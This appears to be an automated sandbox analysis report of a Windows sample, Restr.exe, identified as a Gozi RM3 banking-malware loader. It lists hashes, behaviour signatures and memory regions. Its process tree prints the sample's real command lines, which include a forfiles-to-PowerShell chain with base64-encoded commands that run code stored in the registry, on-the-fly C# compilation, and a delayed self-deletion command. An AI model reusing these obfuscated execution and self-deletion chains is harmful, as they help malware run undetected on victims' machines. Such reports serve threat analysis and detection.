Resubmissions

15-03-2022 08:05

220315-jy3feaahdk 10

15-03-2022 07:24

220315-h8lpzaghf8 10

Analysis

  • max time kernel
    4294211s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    15-03-2022 07:24

General

  • Target

    Restr.exe

  • Size

    252KB

  • MD5

    16959900ff34c0ba60fe2a4d9f1242c5

  • SHA1

    888148f1b31355192e26ea4fc97c91f4c4defe9e

  • SHA256

    0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f

  • SHA512

    a2b7a74fdc6525c5b8ecafc66706136e1e3996e28ebb3b1d8e236b120e59f8c4e85165f385365d706a8391ae2a5f30530a086c7820e26d1a6cd2f19a44da5d54

Score
10/10

Malware Config

Extracted

Family

gozi_rm3

Attributes
  • build

    300994

  • exe_type

    loader

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Deletes itself 1 IoCs
  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Drops file in System32 directory 3 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 51 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 44 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1276
      • C:\Users\Admin\AppData\Local\Temp\Restr.exe
        "C:\Users\Admin\AppData\Local\Temp\Restr.exe"
        2⤵
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:580
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:592
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA==
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1796
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
                6⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:560
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
                6⤵
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1876
              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfhkfkff.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1884
                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7D1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE7D0.tmp"
                  7⤵
                    PID:1344
                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dlbyujxt.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1968
                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE88C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE88B.tmp"
                    7⤵
                      PID:840
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"
            2⤵
            • Deletes itself
            • Suspicious use of WriteProcessMemory
            PID:560
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:2024
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1964
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:275457 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1576
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1964 CREDAT:734213 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:640

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/560-87-0x0000000002314000-0x0000000002317000-memory.dmp

          Filesize

          12KB

        • memory/560-88-0x000000000231B000-0x000000000233A000-memory.dmp

          Filesize

          124KB

        • memory/560-82-0x0000000002310000-0x0000000002312000-memory.dmp

          Filesize

          8KB

        • memory/560-79-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

          Filesize

          11.4MB

        • memory/560-83-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/560-81-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/560-86-0x0000000002312000-0x0000000002314000-memory.dmp

          Filesize

          8KB

        • memory/580-65-0x0000000000260000-0x0000000000262000-memory.dmp

          Filesize

          8KB

        • memory/580-64-0x0000000001000000-0x000000000106F000-memory.dmp

          Filesize

          444KB

        • memory/580-54-0x00000000004EE000-0x00000000004F9000-memory.dmp

          Filesize

          44KB

        • memory/580-112-0x0000000000260000-0x000000000027A000-memory.dmp

          Filesize

          104KB

        • memory/580-55-0x0000000075561000-0x0000000075563000-memory.dmp

          Filesize

          8KB

        • memory/580-56-0x0000000000230000-0x0000000000240000-memory.dmp

          Filesize

          64KB

        • memory/580-62-0x00000000004EE000-0x00000000004F9000-memory.dmp

          Filesize

          44KB

        • memory/580-63-0x0000000000220000-0x000000000022C000-memory.dmp

          Filesize

          48KB

        • memory/1276-222-0x0000000002A50000-0x0000000002A65000-memory.dmp

          Filesize

          84KB

        • memory/1276-223-0x0000000002A20000-0x0000000002A35000-memory.dmp

          Filesize

          84KB

        • memory/1796-76-0x000000000264B000-0x000000000266A000-memory.dmp

          Filesize

          124KB

        • memory/1796-111-0x00000000028D0000-0x00000000028E3000-memory.dmp

          Filesize

          76KB

        • memory/1796-78-0x0000000002640000-0x0000000002642000-memory.dmp

          Filesize

          8KB

        • memory/1796-85-0x0000000002644000-0x0000000002647000-memory.dmp

          Filesize

          12KB

        • memory/1796-75-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/1796-73-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

          Filesize

          3.0MB

        • memory/1796-72-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

          Filesize

          11.4MB

        • memory/1796-71-0x000007FEFB901000-0x000007FEFB903000-memory.dmp

          Filesize

          8KB

        • memory/1796-84-0x0000000002642000-0x0000000002644000-memory.dmp

          Filesize

          8KB

        • memory/1796-80-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/1876-97-0x000000001B760000-0x000000001BA5F000-memory.dmp

          Filesize

          3.0MB

        • memory/1876-95-0x00000000025A2000-0x00000000025A4000-memory.dmp

          Filesize

          8KB

        • memory/1876-94-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/1876-93-0x00000000025A0000-0x00000000025A2000-memory.dmp

          Filesize

          8KB

        • memory/1876-96-0x00000000025A4000-0x00000000025A7000-memory.dmp

          Filesize

          12KB

        • memory/1876-92-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

          Filesize

          9.6MB

        • memory/1876-91-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp

          Filesize

          11.4MB

        • memory/1876-98-0x00000000025AB000-0x00000000025CA000-memory.dmp

          Filesize

          124KB